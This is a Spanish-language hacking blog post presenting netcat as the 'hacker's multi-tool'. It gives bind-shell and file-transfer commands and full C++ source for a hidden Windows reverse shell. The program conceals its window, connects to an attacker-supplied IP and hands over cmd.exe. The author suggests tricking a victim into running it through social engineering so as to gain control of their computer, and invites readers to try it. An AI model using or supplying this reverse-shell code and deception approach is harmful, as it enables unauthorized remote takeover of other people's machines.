Hola después de mucho tiempo. He dejado de escribir porque he estado bastante ocupado este año con la carrera y no he tenido el suficiente tiempo de inversigar nuevas cosas, espero que este año pueda traer nuevas sorpresas por el blog, por el momento he encontrado un viejo video de mis inicios al reversing, he decidido subirlo porque, aunque ahora carece de importancia, representa mi mayor época de entusiamo por el hacking.
Esta herramienta que hoy presento ocupa sobre unos 100kb y sus aplicaciones son infinitas(Desde montar un chat, hasta enviar ficheros o averiguar datos sonbre una web,hasta obtener shells remotas vía LAN o vía WAN).Por eso se ha hecho tan famosa y recibe el nombre de «la navaja multiusos del hacker».
¿Cómo obtener una shell?
Es tan sencillo como abrir una consola en el cliente y poner: nc.exe -L -e cmd.exe -p 6000
En el equipo atacante se pondría: nc.exe 192.168.0.3 6000 y ya estaríamos conectados al cliente.
Pero ocurre un problema,si queremos acceder a un equipo donde no tenemos acceso físico a la máquina siempre se puede utilizar la ingeniería social y enviar a la victima un programa engañoso que haga el trabajo de la parte del cliente del netcat,es decir abrir un puerto a la escucha para que nos podamos conectar y obtener el control del ordenador.Pues bien el programa está aquí:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
//C++ compiler //By Serginho #include #include #include #pragma comment(lib,"ws2_32") int main(int argc, char *argv[]) { ShowWindow(GetForegroundWindow(),SW_HIDE); WSADATA wsaData; SOCKET hSocket; STARTUPINFO si; PROCESS_INFORMATION pi; struct sockaddr_in addr; memset(&addr,0,sizeof(addr)); memset(&si,0,sizeof(si)); WSAStartup(MAKEWORD(2,0),&wsaData); hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); addr.sin_family = AF_INET; addr.sin_port = htons(PUERTO); //Atencion a esta linea, aki va el puerto de conexion NetCat addr.sin_addr.s_addr = inet_addr("AKI TU IP O DOMINIO NO-IP");//Atencion a esta linea, aki va tu IP connect(hSocket,(struct sockaddr*)&addr,sizeof(addr)); si.cb = sizeof(si); si.dwFlags = STARTF_USESTDHANDLES; si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket; CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,π); ExitProcess(0); } |
Si complilamos el exe y lo ejecutamos hace exactamente la misma función.
Enviar y recibir archivos con NetCat
Para poder enviar y recibir archivos con net cat hay que ejecutar comandos en las dos maquinas,o compilar un exe que los ejecute por el netcat.De cualquier suponiendo que el atacante quiere enviar a la vicima,los comando son los siguientes:
Atacante: nc.exe 192.168.0.3 6000 < «archivo»
Víctima: nc.exe -l -p 6000 > «nombre que se le da al archivo»
Netcat se puede descarga aquí.
Y esto es todo por hoy,a probar y a comentar resultados.